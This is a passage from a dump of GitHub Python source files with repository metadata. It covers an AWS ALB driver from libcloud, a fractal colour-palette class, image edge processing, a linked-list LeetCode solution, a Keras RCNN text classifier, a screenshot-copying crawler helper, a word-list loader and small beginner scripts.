\"tags\": self._ex_get_balancer_tags(balancer),\n \"vpc\": findtext(el, xpath=\"VpcId\", namespace=NS),\n }\n\n if len(balancer.extra[\"listeners\"]) > 0:\n balancer.port = balancer.extra[\"listeners\"][0].port\n else:\n balancer.port = None\n\n return balancer\n\n def _to_balancers(self, data):\n xpath = \"DescribeLoadBalancersResult/LoadBalancers/member\"\n return [self._to_balancer(el) for el in findall(element=data, xpath=xpath, namespace=NS)]\n\n def _to_tags(self, data):\n \"\"\"\n return tags dict\n \"\"\"\n tags = {}\n xpath = \"DescribeTagsResult/TagDescriptions/member/Tags/member\"\n\n for el in findall(element=data, xpath=xpath, namespace=NS):\n key = findtext(element=el, xpath=\"Key\", namespace=NS)\n value = findtext(element=el, xpath=\"Value\", namespace=NS)\n if key:\n tags[key] = value\n\n return tags\n\n def _to_rule(self, el):\n def __to_bool__(val):\n return val.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\n conditions = {}\n cond_members = findall(element=el, xpath=\"Conditions/member\", namespace=NS)\n for cond_member in cond_members:\n field = findtext(element=cond_member, xpath=\"Field\", namespace=NS)\n conditions[field] = []\n value_members = findall(element=cond_member, xpath=\"Values/member\", namespace=NS)\n for value_member in value_members:\n conditions[field].append(value_member.text)\n\n rule = ALBRule(\n rule_id=findtext(element=el, xpath=\"RuleArn\", namespace=NS),\n is_default=__to_bool__(findtext(element=el, xpath=\"IsDefault\", namespace=NS)),\n # CreateRule API method accepts only int for priority, however\n # DescribeRules method returns 'default' string for default\n # listener rule. So leaving it as string.\n priority=findtext(element=el, xpath=\"Priority\", namespace=NS),\n target_group=None,\n driver=self.connection.driver,\n conditions=conditions,\n )\n\n rule._target_group_arn = findtext(\n element=el, xpath=\"Actions/member/TargetGroupArn\", namespace=NS\n )\n\n return rule\n\n def _to_rules(self, data):\n xpath = \"DescribeRulesResult/Rules/member\"\n return [self._to_rule(el) for el in findall(element=data, xpath=xpath, namespace=NS)]\n\n def _to_target_groups(self, data):\n xpath = \"DescribeTargetGroupsResult/TargetGroups/member\"\n return [\n self._to_target_group(el) for el in findall(element=data, xpath=xpath, namespace=NS)\n ]\n\n def _to_target_group(self, el):\n target_group = ALBTargetGroup(\n target_group_id=findtext(element=el, xpath=\"TargetGroupArn\", namespace=NS),\n name=findtext(element=el, xpath=\"TargetGroupName\", namespace=NS),\n protocol=findtext(element=el, xpath=\"Protocol\", namespace=NS),\n port=int(findtext(element=el, xpath=\"Port\", namespace=NS)),\n vpc=findtext(element=el, xpath=\"VpcId\", namespace=NS),\n driver=self.connection.driver,\n health_check_timeout=int(\n findtext(element=el, xpath=\"HealthCheckTimeoutSeconds\", namespace=NS)\n ),\n health_check_port=findtext(element=el, xpath=\"HealthCheckPort\", namespace=NS),\n health_check_path=findtext(element=el, xpath=\"HealthCheckPath\", namespace=NS),\n health_check_proto=findtext(element=el, xpath=\"HealthCheckProtocol\", namespace=NS),\n health_check_interval=int(\n findtext(element=el, xpath=\"HealthCheckIntervalSeconds\", namespace=NS)\n ),\n healthy_threshold=int(\n findtext(element=el, xpath=\"HealthyThresholdCount\", namespace=NS)\n ),\n unhealthy_threshold=int(\n findtext(element=el, xpath=\"UnhealthyThresholdCount\", namespace=NS)\n ),\n health_check_matcher=findtext(element=el, xpath=\"Matcher/HttpCode\", namespace=NS),\n )\n\n lbs = findall(element=el, xpath=\"LoadBalancerArns/member\", namespace=NS)\n target_group._balancers_arns = [lb_arn.text for lb_arn in lbs]\n\n return target_group\n\n def _to_target_group_members(self, data):\n xpath = \"DescribeTargetHealthResult/TargetHealthDescriptions/member\"\n return [\n self._to_target_group_member(el)\n for el in findall(element=data, xpath=xpath, namespace=NS)\n ]\n\n def _to_target_group_member(self, el):\n member = Member(\n id=findtext(element=el, xpath=\"Target/Id\", namespace=NS),\n ip=None,\n port=findtext(element=el, xpath=\"Target/Port\", namespace=NS),\n balancer=None,\n extra={\"health\": findtext(element=el, xpath=\"TargetHealth/State\", namespace=NS)},\n )\n return member\n\n def _ex_get_target_group_members(self, target_group):\n \"\"\"\n Return a list of target group member dicts.\n\n :param target_group: target group to fetch members for\n :type target_group: :class:`ALBTargetGroup`\n\n :return: list of target group members\n :rtype: ``list`` of :class:`Member`\n \"\"\"\n\n params = {\"Action\": \"DescribeTargetHealth\", \"TargetGroupArn\": target_group.id}\n\n data = self.connection.request(ROOT, params=params).object\n target_group_members = []\n for tg_member in self._to_target_group_members(data):\n tg_member.extra[\"target_group\"] = target_group\n target_group_members.append(tg_member)\n\n return target_group_members\n\n def _ex_get_balancer_listeners(self, balancer):\n \"\"\"\n Return a list of listeners associated with load balancer.\n\n :param balancer: Load balancer to fetch listeners for\n :type balancer: :class:`LoadBalancer`\n\n :return: list of listener objects\n :rtype: ``list`` of :class:`ALBListener`\n \"\"\"\n params = {\"Action\": \"DescribeListeners\", \"LoadBalancerArn\": balancer.id}\n\n data = self.connection.request(ROOT, params=params).object\n\n return self._to_listeners(data)\n\n def _ex_get_rules_for_listener(self, listener):\n \"\"\"\n Get list of rules associated with listener.\n\n :param listener: Listener object to fetch rules for\n :type listener: :class:`ALBListener`\n\n :return: List of rules\n :rtype: ``list`` of :class:`ALBListener`\n \"\"\"\n\n params = {\"Action\": \"DescribeRules\", \"ListenerArn\": listener.id}\n\n data = self.connection.request(ROOT, params=params).object\n rules = self._to_rules(data)\n for rule in rules:\n rule.listener = listener\n\n return rules\n\n def _ex_get_balancer_tags(self, balancer):\n \"\"\"\n Get a dict of load balancer tags.\n\n :param balancer: Load balancer to fetch tags for\n :type balancer: :class:`LoadBalancer`\n\n :return: Dictionary of tags (name/value) for load balancer\n :rtype: ``dict``\n \"\"\"\n params = {\"Action\": \"DescribeTags\", \"ResourceArns.member.1\": balancer.id}\n data = self.connection.request(ROOT, params=params).object\n return self._to_tags(data)\n\n def _ex_connection_class_kwargs(self):\n pdriver = super()\n kwargs = pdriver._ex_connection_class_kwargs()\n if hasattr(self, \"token\") and self.token is not None:\n kwargs[\"token\"] = self.token\n kwargs[\"signature_version\"] = \"4\"\n else:\n kwargs[\"signature_version\"] = self.signature_version\n\n return kwargs\n\n\n# Commented out to avoid confusion. In AWS ALB relation between load balancer\n# and target group/members is indirect. So it's better to go through full chain\n# to obtain required object(s).\n# Chain is: balancer->listener->rule->target group->member\n#\n# def balancer_list_members(self, balancer):\n# \"\"\"\n# List members of load balancer\n#\n# :param balancer: LoadBalancer to list members for\n# :type balancer: :class:`LoadBalancer`\n#\n# :rtype: ``list`` of :class:`Member`\n# \"\"\"\n# return balancer.extra.get('members', [])\n#\n# def _ex_get_balancer_members(self, balancer):\n# \"\"\"\n# Fetch members across all listeners/rules/target groups\n#\n# :param balancer: load balancer to fetch members for\n# :type balancer: :class:`LoadBalancer`\n#\n# :return: list of load balancer members across all target groups\n# :rtype: ``list`` of :class:`Member`\n# \"\"\"\n# balancer_members = []\n# for listener in balancer.extra.get('listeners', []):\n# for rule in listener.rules:\n# for tg_member in rule.target_group.members:\n# tg_member.balancer = balancer\n# tg_member.extra['target_group'] = rule.target_group\n# balancer_members.append(tg_member)\n#\n# return balancer_members\n#\n# def _ex_get_balancer_target_groups(self, balancer):\n# \"\"\"\n# Return a list of load balancer target groups.\n#\n# :param balancer: load balancer to fetch target groups for\n# :type balancer: :class:`LoadBalancer`\n#\n# :rtype: ``list`` of :class:`ALBTargetGroup`\n# \"\"\"\n# params = {\n# 'Action': 'DescribeTargetGroups',\n# 'LoadBalancerArn': balancer.id\n# }\n#\n# data = self.connection.request(ROOT, params=params).object\n#\n# return self._to_target_groups(data)\n","repo_name":"apache/libcloud","sub_path":"libcloud/loadbalancer/drivers/alb.py","file_name":"alb.py","file_ext":"py","file_size_in_byte":35648,"program_lang":"python","lang":"en","doc_type":"code","stars":1969,"dataset":"github-code","pt":"37"} +{"seq_id":"3929111728","text":"# --\n# File: fractalpalette.py\n#\n# Logical for color palettes\n#\n# --\n\nfrom collections import defaultdict\n\nimport math\nimport numpy as np\n\ndef gaussian(x, mu, sig):\n return np.exp(-np.power(x - mu, 2.) / (2 * np.power(sig, 2.)))\n\nclass FractalPalette:\n \"\"\"\n Color gradient\n \"\"\"\n\n # Color in RGB \n def __init__(self, context):\n self.context = context\n\n self.gradient_size = 1024\n self.palette = []\n\n self.hues = None\n self.histogram = None\n self.per_frame_reset()\n\n\n # called for each pixel\n def raw_calc_from_algo(self, m):\n if m < self.context.max_iter:\n self.histogram[math.floor(m)] += 1\n\n def calc_hues(self): \n #- \n # From histogram normalize to percent-of-total. This is\n # effectively a probability distribution of escape values \n #\n # Note that this is not effecitly a probability distribution for\n # a given escape value. We can use this to calculate the Shannon \n\n total = sum(self.histogram.values())\n h = 0\n\n for i in range(self.context.max_iter):\n if total :\n h += self.histogram[i] / total\n self.hues.append(h)\n self.hues.append(h)\n\n def per_frame_reset(self):\n self.hues = [] \n self.histogram = defaultdict(int) \n\n\n def map_value_to_color(self, m, smoothing=False):\n\n if len(self.palette) == 0: \n c = 255 - int(255 * self.hues[math.floor(m)]) \n return (c, c, c)\n \n if smoothing:\n c1 = self.palette[1024 - int(1024 * self.hues[math.floor(m)])]\n c2 = self.palette[1024 - int(1024 * self.hues[math.ceil(m)])]\n return linear_interpolate(c1,c2,.5) \n else:\n c = self.palette[1024 - int(1024 * self.hues[math.floor(m)])]\n return c \n\n\n def linear_interpolate(color1, color2, fraction):\n new_r = int(math.ceil((color2[0] - color1[0])*fraction) + color1[0])\n new_g = int(math.ceil((color2[1] - color1[1])*fraction) + color1[1])\n new_b = int(math.ceil((color2[2] - color1[2])*fraction) + color1[2])\n return (new_r, new_g, new_b)\n\n\n def create_gauss_gradient(self, c1, c2, mu=0.0, sigma=1.0): \n \n print(\"+ Creating color gradient with gaussian decay\")\n \n if len(self.palette) != 0:\n print(\"Error palette already created\")\n sys.exit(0)\n\n self.palette.append(c2)\n\n x = 0.0\n while len(self.palette) <= self.gradient_size:\n g = gaussian(x,0,.10)\n c = FractalPalette.linear_interpolate(c1, c2, g) \n self.palette.append(c)\n x = x + (1./(self.gradient_size+1))\n\n def create_exp_gradient(self, c1, c2, decay_const = 1.01): \n\n print(\"+ Creating color gradient with exponential decay\")\n \n if len(self.palette) != 0:\n print(\"Error palette already created\")\n sys.exit(0)\n\n\n x = 0.0\n\n while len(self.palette) <= self.gradient_size:\n fraction = math.pow(math.e,-15.*x)\n c = FractalPalette.linear_interpolate(c1, c2, fraction)\n self.palette.append(c)\n x = x + (1. / 1025) \n\n\n def create_exp2_gradient(self, c1, c2, decay_const = 1.01): \n\n print(\"+ Creating color gradient with varying exponential decay\")\n \n if len(self.palette) != 0:\n print(\"Error palette already created\")\n sys.exit(0)\n\n\n x = 0.0\n c = c1\n # Do a very quick decent for the first 1/16 \n while len(self.palette) <= float(self.gradient_size)/32.:\n fraction = math.pow(math.e,-30.*x)\n c = FractalPalette.linear_interpolate((255,255,255), c1, fraction)\n self.palette.append(c)\n x = x + (1. / float(self.gradient_size)) \n\n last_c = c\n x = 0.0\n # Do another quick decent back to first color for the next 1/16 \n while len(self.palette) <= 2.*(float(self.gradient_size) / 16.):\n fraction = math.pow(math.e,-15.*x)\n c = FractalPalette.linear_interpolate((255,255,255), last_c, fraction)\n self.palette.append(c)\n x = x + (1. / float(self.gradient_size)) \n\n last_c = c\n x = 0.0\n # Do another quick decent back to first color for the next 1/16 \n while len(self.palette) <= 2.*(float(self.gradient_size) / 16.):\n fraction = math.pow(math.e,-5.*x)\n c = FractalPalette.linear_interpolate((255,255,255), last_c, fraction)\n self.palette.append(c)\n x = x + (1. / float(self.gradient_size)) \n\n last_c = c\n # For the remaining go back to white \n x = 0.0\n while len(self.palette) <= self.gradient_size :\n fraction = math.pow(math.e,-2.*x)\n c = FractalPalette.linear_interpolate((255,255,255),last_c, fraction)\n self.palette.append(c)\n x = x + (1. / float(self.gradient_size)) \n\n\n def create_normal_gradient(self, c1, c2, decay_const = 1.05): \n \n if len(self.palette) != 0:\n print(\"Error palette already created\")\n sys.exit(0)\n\n fraction = 1.\n while len(self.palette) <= self.gradient_size:\n c = FractalPalette.linear_interpolate(c1, c2, fraction)\n self.palette.append(c)\n fraction = fraction / decay_const\n \n\n # Create 255 value gradient\n # Use the following trivial linear interpolation algorithm\n # (color2 - color1) * fraction + color1\n def create_gradient_from_list(self, color_list = [(255,255,255),(0,0,0),(255,255,255),(0,0,0),(255,255,255),(0,0,0),(241, 247, 215),(255,204,204),(204,204,255),(255,255,204),(255,255,255)]):\n\n print(\"+ Creating color gradient from color list\")\n\n if len(self.palette) != 0:\n print(\"Error palette already created\")\n sys.exit(0)\n \n #the first few colors are critical, so just fill by hand.\n self.palette.append((0,0,0))\n self.palette.append((0,0,0))\n self.palette.append(FractalPalette.linear_interpolate((0,0,0),(255,255,255),.2))\n self.palette.append(FractalPalette.linear_interpolate((0,0,0),(255,255,255),.4))\n self.palette.append(FractalPalette.linear_interpolate((0,0,0),(255,255,255),.6))\n self.palette.append(FractalPalette.linear_interpolate((0,0,0),(255,255,255),.8))\n\n # The magic number 6 here just denotes the previous colors we\n # filled by hand\n section_size = int(float(self.gradient_size-6)/float(len(color_list)-1))\n\n for c in range(0, len(color_list) - 1): \n for i in range(0, section_size+1): \n fraction = float(i)/float(section_size)\n new_color = FractalPalette.linear_interpolate(color_list[c], color_list[c+1], fraction)\n self.palette.append(new_color)\n while len(self.palette) < self.gradient_size:\n c = self.palette[-1]\n self.palette.append(c)\n #assert len(self.palette) == self.gradient_size \n\n def make_frame(self, t): \n\n IMG_WIDTH=1024\n IMG_HEIGHT=100\n \n im = Image.new('RGB', (IMG_WIDTH, IMG_HEIGHT), (0, 0, 0))\n draw = ImageDraw.Draw(im)\n\n color_iter = 0\n for x in range(0,IMG_WIDTH):\n color = self.palette[color_iter]\n for y in range(0,IMG_HEIGHT):\n draw.point([x, y], color) \n color_iter += 1 \n \n\n return np.array(im)\n\n def __iter__(self):\n return self.palette\n\n def __getitem__(self, index):\n return self.palette[index]\n\n def display(self):\n clip = mpy.VideoClip(self.make_frame, duration=64)\n clip.preview(fps=1) #fps 1 is really all that works\n## FractalPalette \n","repo_name":"61cygni/mandl","sub_path":"fractalpalette.py","file_name":"fractalpalette.py","file_ext":"py","file_size_in_byte":7898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72240282026","text":"from PIL import Image, ImageFilter\nimport os\nfrom glob import glob\nimport cv2\n\ninput_dir = \"images/Target\"\noutput_dir = \"images/GrayScale\"\n\ndef overlayEdges(edges, origin):\n background = transformFromCV2ToPillowImageFormat(origin)\n background.paste(edges, (0, 0), edges)\n background = background.convert(\"RGB\")\n return background\n\ndef transformFromCV2ToPillowImageFormat(img):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGBA)\n return Image.fromarray(img)\n\ndef createEdgesOverlay(origin):\n edges = cv2.Canny(origin, 30, 300, 3)\n edges = cv2.dilate(edges, (3, 3))\n edges = cv2.bitwise_not(edges)\n edges = transformFromCV2ToPillowImageFormat(edges)\n makeWhiteBackgroundTransparent(edges)\n edges = edges.filter(ImageFilter.GaussianBlur) #do blurring here because doing it before making background transparent results in white halo\n\n return edges\n\ndef makeWhiteBackgroundTransparent(img):\n datas = img.getdata()\n newData = []\n for item in datas:\n if item[0] == 255 and item[1] == 255 and item[2] == 255:\n newData.append((255, 255, 255, 0))\n else:\n newData.append(item)\n img.putdata(newData)\n\n\ndef img_converter(img_path, output_path):\n origin = cv2.imread(img_path)\n\n edges = cv2.Canny(origin, 30, 300, 3)\n edges = cv2.dilate(edges, (3, 3))\n edges = cv2.bitwise_not(edges)\n edges = transformFromCV2ToPillowImageFormat(edges)\n makeWhiteBackgroundTransparent(edges)\n edges = edges.filter(ImageFilter.GaussianBlur)\n\n background = transformFromCV2ToPillowImageFormat(origin)\n background.paste(edges, (0, 0), edges)\n background = background.convert(\"RGB\")\n background.save(output_path)\n return\n\ndef process_images():\n pathes = glob(\"images/Target/*/*.jpg\")\n # out_path = source_dir.replace(\"Target\", \"GrayScale\")\n for path in pathes:\n out_path = path.replace(\"Target\", \"GrayScale\")\n img_converter(path, out_path)\n\nif __name__ == \"__main__\":\n process_images()","repo_name":"lukabarbakadze/AnimeGAN","sub_path":"scripts/image_to_grayscale.py","file_name":"image_to_grayscale.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12638436049","text":"# https://leetcode.com/problems/intersection-of-two-linked-lists/\n# 160. Intersection of Two Linked Lists\n# Easy\n# Linked List\n# A/B\n\n\nfrom typing import List\nfrom _listHelpers import *\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n if (not headA) or not headB:\n return None\n\n p1, p2 = headA, headB\n while p1 != p2:\n p1 = p1.next if p1 else headB\n p2 = p2.next if p2 else headA\n\n return p1\n\n\nclass SolutionHT:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n dic = {}\n if (not headA) or not headB:\n return None\n \n node = headA\n while node:\n dic[node] = 1\n node = node.next\n \n node = headB\n while node and node not in dic:\n node = node.next\n \n return node\n\nsolution = Solution()\n\nres = solution.getIntersectionNode(construct([4,1,8,4,5]), construct([5,6,1,8,4,5]))\nprintList(res)\n\n","repo_name":"segios/problems","sub_path":"python-problems/Linked List/160. Intersection of Two Linked Lists.py","file_name":"160. Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24165683230","text":"# -*- coding: utf-8 -*-\n# @Date : 2019/9/12\n# @Author : mingming.xu\n# @File : rcnn.py\n\n'''\nhttp://ir.ia.ac.cn/handle/173211/11477\n'''\n\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.layers import Dense, Input, Embedding, LSTM, concatenate, Lambda, Conv1D, GlobalMaxPool1D\nfrom keras.models import Model\n\n\nclass RCNN(object):\n def __init__(self, maxlen, max_feats, emb_dim, class_num=1, last_activation='sigmoid'):\n self.maxlen = maxlen\n self.max_feats = max_feats\n self.emb_dim = emb_dim\n self.class_num = class_num\n self.last_activation = last_activation\n\n def get_model(self):\n input_ = Input((self.maxlen, ))\n input_left = Input((self.maxlen, ))\n input_right = Input((self.maxlen, ))\n\n embedding = Embedding(input_dim=self.max_feats, output_dim=self.emb_dim, input_length=self.maxlen)\n emb_ = embedding(input_)\n emb_left = embedding(input_left)\n emb_right = embedding(input_right)\n\n enc_left = LSTM(128, activation='tanh', return_sequences=True)(emb_left)\n enc_right = LSTM(128, activation='tanh', go_backwards=True, return_sequences=True)(emb_right)\n enc_right = Lambda(lambda x: tf.reverse(x, axis=[1]))(enc_right)\n\n x = concatenate([enc_left, emb_, enc_right], axis=-1)\n\n x = Conv1D(32, kernel_size=1, activation='tanh')(x)\n x = GlobalMaxPool1D()(x)\n\n output = Dense(self.class_num, activation=self.last_activation)(x)\n model = Model(inputs=[input_, input_left, input_right], outputs=output)\n return model\n","repo_name":"xv44586/Papers","sub_path":"NLP/TextClassification/RCNN/rcnn.py","file_name":"rcnn.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36030780803","text":"import imp\n\n\nimport sys\nimport os\nsys.path.append(\"./backend\")\nfrom db import DB\nfrom configSys import config\nResult_DIR = config['result_dir']\nSRC = Result_DIR+'crawler/crawler_result'\ncluster_id_path = '/home/ch/Scan/6'\n\n\n\nif '__main__' == __name__:\n db = DB() \n rows = db.fetch(\"select crawler_id, target_url from fraud_crawler_sustainable where sus_flag = 4 and web_status_code = 200;\") \n if not os.path.exists(cluster_id_path):\n os.makedirs(cluster_id_path) \n for row in rows:\n id = row[0]\n url = row[1]\n src = f'{SRC}/{url}/screenshot.png'\n dst = f'{cluster_id_path}/\"{url}\".png'\n copy_cmd = f'cp {src} {dst}'\n os.system(copy_cmd)","repo_name":"Chengxiaosa/sus","sub_path":"backend/resources/sus_crawler/addFraudcase.py","file_name":"addFraudcase.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15814045448","text":"'''\nAsk for name as input and validate it's not less than or equal to 3 characters and not more than 12 characters\nusing logical operators\n'''\n\nname = input(\"Enter you name \")\nif (len(name) <= 3) or (len(name) >= 12):\n print(\"Name should be between 4 to 12 characters\")\nelse:\n print(\"you have a valid name\")","repo_name":"oldmonkandlinux/python-basics","sub_path":"ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21400188221","text":"fileName = 'wordListBlizz'\n\n\nclass WordShelf(object):\n\n articles = []\n adjectives = []\n adverbs = []\n\n nouns = {\n 'singular': [],\n 'plural': []}\n\n names = {\n 'special': [],\n 'other': []}\n\n # VERBS:\n # [singular, plural]\n # [first, second, third]\n # [past, present, future]\n\n verbs = { # plurality\n 'singular': {},\n 'plural': {}}\n\n for plurality in verbs: # person\n\n verbs[plurality] = {\n 'first': {},\n 'second': {},\n 'third': {}}\n\n for plurality in verbs:\n for person in verbs[plurality]: # tense\n\n verbs[plurality][person] = {\n 'past': [],\n 'present': [],\n 'future': []}\n\n # argument should be the name of the file\n def __init__(self):\n\n self.wordList = [line for line in open(fileName)]\n\n # Put the words in the wordfile where they belong\n if not self.articles:\n self.articles = self.getArticles()\n if not self.adjectives:\n self.adjectives = self.getAdjectives()\n if not self.adverbs:\n self.addAdverbs()\n if not self.nouns['singular']: # if singular is not set,\n self.addNouns() # then plural wont be either\n if not self.names['other']:\n self.addNames()\n if not self.verbs['singular']['first']['past']: # same logic^\n self.verbs = self.getVerbs()\n\n def getArticles(self):\n\n articles = []\n\n # tuple to point where start and end of articles is at\n start, end = (\n self.wordList.index('ARTICLES\\n'),\n self.wordList.index('END\\n'))\n\n # assignment\n for words in self.wordList[start+1: end]:\n articles.append(words.strip().replace('_', ' '))\n\n return articles\n\n def getAdjectives(self):\n\n adjectives = []\n\n # tuple to point where start and end of articles is at\n start, end = (\n self.wordList.index('ADJECTIVES\\n'),\n self.wordList.index('ADVERBS\\n'))\n\n # assignment\n for words in self.wordList[start+1: end]:\n adjectives.append(words.strip().replace('_', ' '))\n\n return adjectives\n\n def addAdverbs(self):\n\n # tuple to point where start and end of articles is at\n start, end = (\n self.wordList.index('ADVERBS\\n'),\n self.wordList.index('NOUNS\\n'))\n\n # assignment\n for words in self.wordList[start+1: end]:\n self.adverbs.append(words.strip().replace('_', ' '))\n\n def addNouns(self):\n\n # tuple to point where start and end of articles is at\n start, end = (\n self.wordList.index('NOUNS\\n'),\n self.wordList.index('VERBS\\n'))\n\n # separate nouns into words on left and words on right\n left, right = [], []\n\n # split words into list, then append to left/right\n for words in self.wordList[start+2: end]:\n words = words.split()\n left.append(words[0].replace('_', ' '))\n right.append(words[1].replace('_', ' '))\n\n # left are singular nouns, right are plural nouns\n self.nouns['singular'] = left\n self.nouns['plural'] = right\n\n def addNames(self):\n\n names = {}\n\n # shortened height of wordList\n wordList = self.wordList[\n self.wordList.index('NAMES\\n'):\n self.wordList.index(' OTHER\\n')]\n\n # special names\n names['special'] = [\n name.strip().replace('_', ' ')\n for name in filter(lambda word: not word.isupper(),\n wordList)]\n\n # re-shortened for other names\n wordList = self.wordList[\n self.wordList.index(' OTHER\\n'):\n self.wordList.index('ARTICLES\\n')]\n\n names['other'] = [\n name.strip().replace('_', ' ')\n for name in filter(lambda word: not word.isupper(),\n wordList)]\n\n self.names = names\n\n def getVerbs(self):\n\n # let's first condense our list. . .\n start, end = (\n self.wordList.index('VERBS\\n'),\n self.wordList.index('NAMES\\n'))\n\n verbList = self.wordList[start: end]\n\n # { plurality: index }\n IndPlu = {\n 'SINGULAR': 0,\n 'PLURAL': 0}\n\n for i, value in enumerate(verbList):\n for key in IndPlu:\n if key in value:\n IndPlu[key] = i\n\n # let's condense our list for the singulars\n littleList = verbList[IndPlu['SINGULAR']: IndPlu['PLURAL']]\n\n # { person, index }\n IndPerson = {\n 'FIRST': 0,\n 'SECOND': 0,\n 'THIRD': 0}\n\n for i, value in enumerate(littleList):\n for key in IndPerson:\n if key in value:\n IndPerson[key] = i\n\n verbs = self.verbs\n # SINGULAR\n # FIRST\n for lines in littleList[IndPerson['FIRST']+2: IndPerson['SECOND']]:\n lines = lines.split()\n verbs['singular']['first']['past'].append(\n lines[0].replace('_', ' '))\n verbs['singular']['first']['present'].append(\n lines[1].replace('_', ' '))\n verbs['singular']['first']['future'].append(\n lines[2].replace('_', ' '))\n\n # SECOND\n for lines in littleList[IndPerson['SECOND']+2: IndPerson['THIRD']]:\n lines = lines.split()\n verbs['singular']['second']['past'].append(\n lines[0].replace('_', ' '))\n verbs['singular']['second']['present'].append(\n lines[1].replace('_', ' '))\n verbs['singular']['second']['future'].append(\n lines[2].replace('_', ' '))\n\n # THIRD\n for lines in littleList[IndPerson['THIRD']+2: IndPlu['PLURAL']]:\n lines = lines.split()\n verbs['singular']['third']['past'].append(\n lines[0].replace('_', ' '))\n verbs['singular']['third']['present'].append(\n lines[1].replace('_', ' '))\n verbs['singular']['third']['future'].append(\n lines[2].replace('_', ' '))\n\n # PLURAL\n\n # let's condense our list for the singulars\n littleList = verbList[IndPlu['PLURAL']: len(verbList)]\n\n # { person, index }\n IndPerson = {\n 'FIRST': 0,\n 'SECOND': 0,\n 'THIRD': 0}\n\n for i, value in enumerate(littleList):\n for key in IndPerson:\n if key in value:\n IndPerson[key] = i\n\n # FIRST\n for lines in littleList[IndPerson['FIRST']+2: IndPerson['SECOND']]:\n lines = lines.split()\n verbs['plural']['first']['past'].append(lines[0].replace('_', ' '))\n verbs['plural']['first']['present'].append(\n lines[1].replace('_', ' '))\n verbs['plural']['first']['future'].append(\n lines[2].replace('_', ' '))\n\n # SECOND\n for lines in littleList[IndPerson['SECOND']+2: IndPerson['THIRD']]:\n lines = lines.split()\n verbs['plural']['second']['past'].append(lines[0].replace('_', ' '))\n verbs['plural']['second']['present'].append(\n lines[1].replace('_', ' '))\n verbs['plural']['second']['future'].append(\n lines[2].replace('_', ' '))\n\n # THIRD\n for lines in littleList[IndPerson['THIRD']+2: IndPlu['PLURAL']]:\n lines = lines.split()\n verbs['plural']['third']['past'].append(lines[0].replace('_', ' '))\n verbs['plural']['third']['present'].append(\n lines[1].replace('_', ' '))\n verbs['plural']['third']['future'].append(\n lines[2].replace('_', ' '))\n\n return verbs\n\n\nwordShelf = WordShelf()\n","repo_name":"JustenRickert/PythonStory","sub_path":"words/wordShelf.py","file_name":"wordShelf.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28856510447","text":"from abc import ABC, abstractmethod\nfrom typing import Any, Callable, Tuple\n\nimport numpy as np\n\n\nclass DataLoader(ABC):\n @abstractmethod\n def get_data_batch(self, batch_size: int) -> Any:\n \"\"\"\n :param batch_size: how many data do you want\n :return: batch of data\n \"\"\"\n pass\n\n\nclass NumpyDataLoader(DataLoader):\n def __init__(self, data: np.ndarray, labels: np.ndarray, shuffle: bool = False):\n permutation = (\n np.random.permutation(data.shape[0])\n if shuffle\n else np.arange(data.shape[0])\n )\n self.__data__ = data.copy()[permutation]\n self.__labels__ = np.array(labels.copy())[permutation]\n self.__current_index__ = 0\n\n def get_data_batch(self, batch_size: int) -> Tuple[np.ndarray, np.ndarray]:\n left = self.__current_index__\n self.__current_index__ += batch_size\n return (\n self.__data__[\n left : self.__current_index__,\n ],\n self.__labels__[left : self.__current_index__],\n )\n\n\nclass GeneratorBasedLoader(DataLoader):\n def __init__(self, generator_func: Callable[[], Tuple[Any, Any]]):\n \"\"\"\n :param generator_func:\n :param calc_shapes_on_init:\n \"\"\"\n self.__generator_func__ = generator_func\n\n def get_data_batch(self, batch_size: int) -> Tuple[np.ndarray, np.ndarray]:\n data = []\n target = []\n for _ in range(batch_size):\n current_data, current_target = self.__generator_func__()\n data.append(current_data)\n target.append(current_target)\n return np.array(data), np.array(target)\n\n\nclass StubDataLoader(DataLoader):\n def __init__(self):\n self.__stub__ = np.array([0])\n\n def get_data_batch(self, batch_size: int) -> Tuple[np.ndarray, np.ndarray]:\n return self.__stub__, self.__stub__\n","repo_name":"kokamido/TryToMakeSmthng","sub_path":"MyML/DataPipelineTools/DataLoader.py","file_name":"DataLoader.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6018149587","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# \n \nimport sys\n\n\ndef __str__():\n\treturn \t\"eu faço médias\"\n\n\ndef media(valores):\n\tmedia \t= 0.0\n\tsoma \t= 0.0\n\n\tfor i in range(1,len(valores)):\n\t\tsoma += float(valores[i])\n\n\treturn soma/(len(valores)-1)\n\n \ndef processador(args):\n\n # print(args[0]) #o argumento na posição 0 é o nome do script\n \n print(\"A média dos valores:\\n\")\n \n for i in range(1,len(args)):\n \tprint(args[i])\n\n print(\"\\nÉ...\",str(media(args)))\n \n return 0\n \n\n\n\nif __name__ == '__main__':\n sys.exit(processador(sys.argv))","repo_name":"rafaelstojoao/python4dataScience","sub_path":"codigosDeepNote/Aula_02 - Classes Módulos e 